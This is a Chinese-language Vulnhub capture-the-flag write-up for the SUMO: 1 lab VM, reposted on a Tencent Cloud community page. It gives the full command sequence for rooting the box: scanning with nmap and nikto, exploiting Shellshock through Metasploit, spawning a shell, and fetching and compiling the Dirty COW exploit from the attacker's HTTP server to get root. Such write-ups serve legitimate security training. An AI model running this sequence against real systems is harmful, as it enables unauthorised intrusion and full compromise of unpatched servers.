前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Vulnhub-SUMO: 1

Vulnhub-SUMO: 1

作者头像
亿人安全
发布2022-06-30 15:01:44
3310
发布2022-06-30 15:01:44
举报
文章被收录于专栏:红蓝对抗

靶机描述:

Target Address:http://www.vulnhub.com/entry/sumo-1,480/

Difficulty: Beginner(新手)

Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).

Operating System: Linux

扫描靶机ip为192.168.86.152

代码语言:javascript
复制
arp-scan -l

版本侦测和查看开放端口

代码语言:javascript
复制
nmap -sV -p- 192.168.86.152

进入浏览器访问80端口,提示此为服务器默认页面

代码语言:javascript
复制
http://192.168.86.152:80

执行nikto命令,OSVDB-112004似乎存在漏洞

代码语言:javascript
复制
nikto -h http://192.168.86.152

用浏览器查看提示页面,找出漏洞id名CVE-2014-6271

代码语言:javascript
复制
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)

使用msfconsole,搜索攻击方式

代码语言:javascript
复制
msfconsole
search CVE-2014-6271

选择攻击方式,进行攻击设置

代码语言:javascript
复制
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set rhosts 192.168.86.152
set targeturi /cgi-bin/test
run

反弹shell,变为交互式tty,查看文件属性

代码语言:javascript
复制
shell
python -c'import pty;pty.spawn('/bin/bash')'

使用脏牛提权,而脏牛提权漏洞影响>=2.4.22版本,执行命令查看内核版本

下载脏牛漏洞脚本,文件名为dirtycowscan.sh

代码语言:javascript
复制
https://github.com/aishee/scan-dirtycow/blob/master/dirtycowscan.sh

kali开启http服务

代码语言:javascript
复制
python -m SimpleHTTPServer 8000 

远程访问kali并下载脚本文件,扫描并发现存在脏牛漏洞

把链接中的代码在kali中编辑成.c的格式

代码语言:javascript
复制
https://www.exploit-db.com/raw/40839

在shell中下载dirty.c的文件,修改文件权限,进行编译(方法在脚本的注释行中)

代码语言:javascript
复制
wget http://192.168.86.138:8000/dirty.c
chmod 777
gcc -pthread dirty.c -o dirty -lcrypt

运行脚本,输入密码的地方可以随意设置

代码语言:javascript
复制
./dirty testpasswd

使用firefart用户登录,使用刚刚设置的密码,获得root权限,拿到flag

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-06-24,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 亿人安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档